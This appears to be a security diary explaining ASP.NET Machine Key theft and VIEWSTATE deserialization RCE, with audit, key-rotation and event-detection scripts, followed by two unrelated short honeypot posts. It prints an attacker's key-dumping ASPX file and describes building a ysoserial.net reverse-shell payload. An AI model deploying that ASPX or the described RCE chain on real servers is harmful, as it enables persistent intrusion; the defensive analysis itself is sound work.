A Machine Key in IIS and ASP.NET is a configuration setting used to ensure the security and integrity of data exchanged between the server and clients.

Basically, it is responsible for validating and encrypting sensitive data such as VIEWSTATE, cookies, and session state, protecting them from tampering or unauthorized access. An IIS administrator can define specific Machine Key settings – there are many possible ways to configure all of this, but for this diary we will look into VIEWSTATE protection.

VIEWSTATE is a mechanism used in ASP.NET Web Forms to persist the state of controls and page data between postbacks (i.e., between user actions that send the page back to the server). It allows a developer to easily store values of various controls after a form has been submitted. VIEWSTATE is always used by an IIS ASP.NET application.

Since VIEWSTATE can hold sensitive information, it should be appropriately protected. And this is where Machine Keys come into the game – they are used by IIS to prevent tampering of VIEWSTATE and (optionally) encrypt its contents.

By default, IIS (even the very latest version on Windows server 2025) will enable VIEWSTATE MAC (Message Authentication Code) validation but will leave encryption on “Auto” which means that it is not used, as shown in the figure below:

This is not too big of a problem, unless a developer decides to store something confidential in VIEWSTATE.

Machine Key, as you can probably guess by now, is used to perform validation – again, by default SHA1 is used. Several other algorithms are supported, with HMACSHA256 being the second most commonly used one.

Machine Key handling

Since Machine Key is used to validate VIEWSTATE integrity, it is obviously a very important security element. If an attacker gets Machine Key of a server, they can modify VIEWSTATE (and cookies) to arbitrary values and calculate proper MAC which could allow them to perform all sorts of abuse – even achieve remote code execution, as we will demonstrate later.

So, how does one handle this? The whole setup can get a bit complex depending under which account IIS is running, but in most common setups, one of the following two approaches is used:

  • Machine Key is automatically generated by IIS. This is the default setup (one you can see in the image above) and in this case Machine Key is stored in Registry.
  • Machine Key is generated by an administrator and stored in the web.config file. This is actually mandatory if you have a farm of servers behind a load balancer that need to be able to share sessions so such a setup is quite common!

Stealing a Machine Key

An attacker’s ultimate prize is to steal a Machine Key used by the target IIS server. So, how can they achieve that?

If the Machine Key is stored in a web.config file, in the majority of cases it will be stored there in plain text! While it’s possible to encrypt the config section, this is very rarely done. In other words, an attacker that can fetch the web.config file can basically pwn the whole server!
This can be done, for example, through LFI (Local File Inclusion) or XXE (XML External Entities) vulnerabilities that allow the attacker to fetch contents of files.

If the Machine Key is automatically generated, it is stored in Registry, which means that the attacker needs code execution on the server to fetch this, but one important thing should be stressed here: there is nothing that can be done to prevent them from reading the Machine Key, provided they get code execution, even through ASPX files!
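Two things the text above makes reviewable in a web.config are the validation algorithm (SHA1 by default, with HMACSHA256 the usual stronger choice) and whether an explicit Machine Key sits in the file in plaintext rather than in an encrypted configuration section. The block below is an added audit script (not the diary's code and not a Microsoft tool) that reads a web.config, locates the machineKey element and reports those conditions. The three embedded configs are constructed: a plaintext key with the SHA1 default and a 3DES decryption setting, the same section after `aspnet_regiis -pe "system.web/machineKey"` has encrypted it (recognisable by the configProtectionProvider attribute), and a config with no machineKey at all, which means IIS auto-generates one in the registry. The "weak" sets encode an audit policy assumed for the demo, not an ASP.NET rule.

```python
import xml.etree.ElementTree as ET

# Audit policy assumed for this demo: anything outside the HMACSHA256/384/512
# family is reported as weak validation; DES-family ciphers as weak decryption.
WEAK_VALIDATION = {"MD5", "SHA1", "3DES", "AES"}
WEAK_DECRYPTION = {"DES", "3DES"}

# Constructed web.config: explicit key in plaintext, SHA1 validation, 3DES decryption.
# The key values are dummies.
WEAK_CONFIG = """\
<configuration>
  <system.web>
    <machineKey validationKey="0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF"
                decryptionKey="0123456789ABCDEF0123456789ABCDEF"
                validation="SHA1" decryption="3DES" />
  </system.web>
</configuration>
"""

# Constructed: the same section after aspnet_regiis encrypted it. The element
# carries configProtectionProvider and ciphertext instead of key attributes.
PROTECTED_CONFIG = """\
<configuration>
  <system.web>
    <machineKey configProtectionProvider="RsaProtectedConfigurationProvider">
      <EncryptedData>PLACEHOLDER-CIPHERTEXT</EncryptedData>
    </machineKey>
  </system.web>
</configuration>
"""

# Constructed: no machineKey element, so IIS auto-generates one (registry).
AUTO_CONFIG = "<configuration><system.web/></configuration>"


def audit_machine_key(config_xml):
    """Return a list of (code, message) findings for the machineKey section."""
    findings = []
    root = ET.fromstring(config_xml)
    mk = next(root.iter("machineKey"), None)
    if mk is None:
        findings.append(("AUTO_GENERATED",
                         "no machineKey element: IIS auto-generates the key and keeps it in "
                         "the registry; a farm behind a load balancer needs an explicit shared key"))
        return findings
    provider = mk.get("configProtectionProvider")
    if provider:
        findings.append(("ENCRYPTED_SECTION",
                         f"machineKey section protected by {provider}; reading the file "
                         "alone does not expose the key"))
        return findings
    for attr in ("validationKey", "decryptionKey"):
        value = mk.get(attr)
        if value and not value.startswith("AutoGenerate"):
            findings.append(("PLAINTEXT_KEY",
                             f"{attr} is stored in plaintext; anyone who can read "
                             "web.config holds it"))
    validation = mk.get("validation")
    if validation in WEAK_VALIDATION:
        findings.append(("WEAK_VALIDATION",
                         f"validation={validation}; prefer HMACSHA256 or stronger"))
    decryption = mk.get("decryption")
    if decryption in WEAK_DECRYPTION:
        findings.append(("WEAK_DECRYPTION", f"decryption={decryption}; prefer AES"))
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("protected", PROTECTED_CONFIG),
                      ("auto", AUTO_CONFIG)):
        print(name)
        for code, msg in audit_machine_key(cfg):
            print(f"  [{code}] {msg}")
```

A PLAINTEXT_KEY finding is exactly the case the SharePoint attackers' ASPX file was written for; an ENCRYPTED_SECTION result closes that file-read path, while, as the text says, it does nothing against an attacker who already has code execution on the server.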

Back to our SharePoint story – once the original attackers exploited a vulnerable SharePoint server, they uploaded the following ASPX file:

<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script runat="server" language="c#" CODEPAGE="65001">
public void Page_load()
{
    var sy = System.Reflection.Assembly.Load("System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
    var mkt = sy.GetType("System.Web.Configuration.MachineKeySection");
    var gac = mkt.GetMethod("GetApplicationConfig", System.Reflection.BindingFlags.Static | System.Reflection.BindingFlags.NonPublic);
    var cg = (System.Web.Configuration.MachineKeySection)gac.Invoke(null, new object[0]);
    Response.Write(cg.ValidationKey+"|"+cg.Validation+"|"+cg.DecryptionKey+"|"+cg.Decryption+"|"+cg.CompatibilityMode);
}
</script>

What does this script do? It will try to read the web.config file and will display both the validation and encryption keys, together with the mode used. If the Machine Key was stored in web.config, it would be leaked to the attacker, as shown in the image below:

With the Machine Key available, the attacker can now achieve RCE on the affected server, due to the way deserialization of VIEWSTATE works (and this is a feature!) – more about that further below, but let's first see the other case, when the Machine Key is automatically generated and not stored in web.config:

Oh! No luck for the attacker, this script was not able to fetch the Machine Key. Phew, all good, we do not have to do anything … or do we? Remember that I wrote above that automatically generated Machine Keys are stored in the Registry. Is there anything preventing the attacker from dropping a slightly better ASPX file that can read the Registry?

Unfortunately NOT, as Soroush Dalili wrote in their fantastic blog here - one can simply read the key, no matter where it is stored. Soroush published a small ASPX file that goes through all potential locations of a Machine Key.

Clearly the SharePoint attackers either did not care about other locations (and were happy with the web.config ones) or did not know about this, but if you use Soroush's script you can fetch the Machine Key even when it's automatically generated, as shown for the same application I am using as a proof of concept below:

The bottom line here is the following: if anyone gets any code execution on an IIS server, you absolutely need to regenerate the server's Machine Key. Windows will not do this automatically for you, and this key persists through reboots!
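Putting that advice into practice, here is an added example (my own, not from the diary or from Soroush's post) that writes a freshly generated, explicit machineKey element into one application's web.config. An explicit key overrides an automatically generated one, so this covers both storage options described earlier; the $WebConfigPath value is an assumption.

```powershell
# Added example, not from the diary: replace an application's Machine Key with new
# random values by writing an explicit <machineKey> into its web.config.
# Assumption: $WebConfigPath points at the application that needs re-keying.
$WebConfigPath = 'C:\inetpub\wwwroot\MyApp\web.config'

function New-HexKey {
    param([int]$ByteCount)
    # Cryptographically random bytes rendered as the upper-case hex string ASP.NET expects
    $bytes = New-Object byte[] $ByteCount
    [System.Security.Cryptography.RandomNumberGenerator]::Create().GetBytes($bytes)
    return ($bytes | ForEach-Object { $_.ToString('X2') }) -join ''
}

$validationKey = New-HexKey -ByteCount 64   # 512-bit key for HMACSHA256 validation
$decryptionKey = New-HexKey -ByteCount 32   # 256-bit key for AES encryption

$cfg = New-Object System.Xml.XmlDocument
$cfg.PreserveWhitespace = $true
$cfg.Load($WebConfigPath)

# Create <system.web> and <machineKey> if the file does not have them yet
$systemWeb = $cfg.SelectSingleNode('/configuration/system.web')
if ($null -eq $systemWeb) {
    $systemWeb = $cfg.DocumentElement.AppendChild($cfg.CreateElement('system.web'))
}
$machineKey = $systemWeb.SelectSingleNode('machineKey')
if ($null -eq $machineKey) {
    $machineKey = $systemWeb.AppendChild($cfg.CreateElement('machineKey'))
}

# Any existing values are overwritten: VIEWSTATE and cookies signed with the old key
# stop validating, which is exactly the point after a compromise
$machineKey.SetAttribute('validationKey', $validationKey)
$machineKey.SetAttribute('decryptionKey', $decryptionKey)
$machineKey.SetAttribute('validation', 'HMACSHA256')
$machineKey.SetAttribute('decryption', 'AES')

# Keep a copy of the previous file; saving web.config also recycles the application
Copy-Item -Path $WebConfigPath -Destination "$WebConfigPath.bak" -Force
$cfg.Save($WebConfigPath)
Write-Host "machineKey replaced in $WebConfigPath"
```

On a load-balanced farm the same values must be written on every node. Since the key now sits in web.config in plain text, `aspnet_regiis -pe "system.web/machineKey" -app "/MyApp"` encrypts that section in place (the application path is an assumption).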

Remote Code Execution

So what can one do with Machine Key now?

While we could modify values in VIEWSTATE by hand (it is a bit difficult to read as it's serialized, but not impossible, of course), one can also use Alvaro Munoz's fantastic ysoserial.net, which has built-in support for generating VIEWSTATE objects.

Now that we have a valid Machine Key, ysoserial.net allows us to create an object which, upon deserialization on the server side, will execute code. Since the MAC will be valid (and the payload even encrypted, if needed), IIS will happily try to deserialize it with the LosFormatter class, which ultimately allows for Remote Code Execution through deserialization, as there are known gadgets that can be used here.

There are two key points here:

  1. There is nothing an administrator can do to prevent this if an attacker has a valid Machine Key.
  2. A malicious VIEWSTATE parameter can be used with *any* ASPX script on the server; it does not need to be the originally vulnerable one. There are some caveats on how to produce a valid VIEWSTATE parameter based on the application path, but there are many other resources that explain how to do this.

To reiterate – once an attacker has a valid Machine Key they basically have a backdoor to the IIS server that they can use at any point in time, as long as the Machine Key has not been changed!

PoC || GTFO

Let’s demonstrate this. I have a very simple application that allows a user to input their name (and will use it in a diary in the future as well), that looks like this:

When the Submit button is clicked, the following request is sent:

Now, the IIS server that I have set up is using automatically generated Machine Keys, to make exploitation a bit more interesting (notice I didn't say difficult). When using the script that Soroush posted, the following information can again be seen:


This leaves us with all information needed to exploit this server.

We will use ysoserial.net to do this, specifically with following options:

  • The plugin we will use will be ViewState, which will allow us to generate a malicious VIEWSTATE object, provided we know the Machine Key
  • The gadget chain will be TextFormattingRunProperties – it usually generates the shortest payload and supports LosFormatter
  • The command will be our PowerShell which will connect to our Netcat listener
  • Finally we will need to provide the following:
    • Validation key is the Machine Key from above. I will be using an application-specific validation key, as we can see that, besides the Machine Key being automatically generated, the server is using IsolateApps, so every application has its own Machine Key, which is derived from the initial one
    • Validation algorithm will be HMACSHA256
    • My path and apppath will correspond to the application I am attacking (see Soroush’s post for more information about this)
    • Finally I am using the algorithm suitable for .NET 4.0


All we need to do now is go back and resend the request, but this time with our malicious VIEWSTATE object:

The response will be 500 Internal Server Error, but that’s what we want:

And we get our reverse shell happy dance:

Finally, the attacker can now use this malicious VIEWSTATE object on any page that belongs to this application, no matter what other parameters are sent as IIS will first try to deserialize the received VIEWSTATE object. And that’s their persistent backdoor.

Detection

IIS will at least log an event when Viewstate verification has failed. Failed here does not mean that the MAC was incorrect (that is silently ignored), but that the verification process itself failed, which will happen when deserialization is exploited.

The full VIEWSTATE object is logged, so that also allows for inspection of what has happened. If you do not already, make sure that you are monitoring Event Code 4009 in the Windows Application log. Such an event will look as shown below:
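As an added example (not from the diary), the following PowerShell pulls those events from the Application log and summarises the fields a responder wants to see first. The field labels follow the standard ASP.NET health-monitoring event layout; the provider name and the 24-hour lookback window are assumptions.

```powershell
# Added example, not from the diary: summarise ASP.NET "Viewstate verification failed"
# events from the Windows Application log. The ASP.NET event code 4009 is part of the
# message text (it is not necessarily the Windows Event ID), so we filter on the message.
# Assumptions: the provider name for ASP.NET 4.x and a 24-hour lookback window.

function Get-EventField {
    param([string]$Message, [string]$Label)
    # Health-monitoring events list one "Label: value" pair per line
    if ($Message -match "(?m)^\s*$([regex]::Escape($Label)):\s*(.*)$") { return $Matches[1].Trim() }
    return ''
}

function Get-ViewStateFailure {
    param(
        [int]$LookbackHours = 24,
        [string]$Provider = 'ASP.NET 4.0.30319.0'   # assumption: adjust to the installed runtime
    )
    $filter = @{
        LogName      = 'Application'
        ProviderName = $Provider
        StartTime    = (Get-Date).AddHours(-$LookbackHours)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'Event code:\s*4009' } |
        ForEach-Object {
            $vs = Get-EventField -Message $_.Message -Label 'ViewState'
            # Decoded size is a cheap triage signal: a small form's ViewState is usually a
            # few hundred bytes, while a deserialization gadget chain runs to kilobytes
            $decodedLength = 0
            try { $decodedLength = [Convert]::FromBase64String($vs).Length } catch { }
            [pscustomobject]@{
                Time           = $_.TimeCreated
                ClientIP       = Get-EventField -Message $_.Message -Label 'User host address'
                RequestPath    = Get-EventField -Message $_.Message -Label 'Request path'
                UserAgent      = Get-EventField -Message $_.Message -Label 'User-Agent'
                ViewStateBytes = $decodedLength
                ViewState      = $vs
            }
        }
}

# Largest payloads first; the ViewState column is kept on the objects for deeper inspection
Get-ViewStateFailure |
    Sort-Object ViewStateBytes -Descending |
    Format-Table Time, ClientIP, RequestPath, ViewStateBytes, UserAgent -AutoSize
```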

--
Bojan
X | LinkedIn

INFIGO IS | An Allurity Group member


Published: 2025-08-04

New Feature: Daily Trends Report

I implemented a new report today, the "Daily Trends" report. It summarizes noteworthy data received from our honeypot. As with everything, it will improve if you provide feedback :)

There are two ways to receive the report:

  1. E-Mail: Sign up at https://isc.sans.edu/notify.html 
  2. JSON/HTTP: You may also just download the raw JSON data for the report at https://isc.sans.edu/feeds/trends.json

The sections of the report:

  • Top 10 newly registered domains, based on our domain score (the higher, the more suspect)
  • Top 10 URLs: The top 10 newly seen URLs from our web honeypot.
  • Top 10 New SSH/Telnet usernames: Usernames our Cowrie honeypots have not seen before.
  • Top 10 Trending ports

The layout will be refined for sure. Let me know if the data is useful.

Can't receive the email? E-mail delivery has always been an issue, which is why we offer the JSON report as well.

(Image: daily trends report snippet)

--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu


Published: 2025-08-03

Legacy May Kill

Just saw something that I thought was long gone. The username "pop3user" is showing up in our telnet/ssh logs. I don't know how long ago it was that I used POP3 to retrieve e-mail from one of my mail servers. IMAP and various webmail systems have long since replaced this classic email protocol. But at least this one attacker is counting on someone still having a "pop3user" configured.

The passwords attempted are the classics "pop3user" and "123456". The sole IP address scanning for this username is 193.32.162.157. The IP address is part of AS47890, which is managed by Unmanaged (I am not making this up..)

route:          193.32.162.0/24
origin:         AS47890
mnt-by:         UNMANAGED
mnt-by:         ro-btel2-1-mnt
created:        2022-11-21T17:07:38Z
last-modified:  2022-11-21T17:07:38Z
source:         RIPE

The website for unmanaged.uk is blank, the network is probably unmanaged... not a fan of blocklists, but I would consider AS47890 a good candidate for a block.

pop3 still being used (maybe?), unmanaged networks... why are we wasting time trying to worry about 0-days?

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
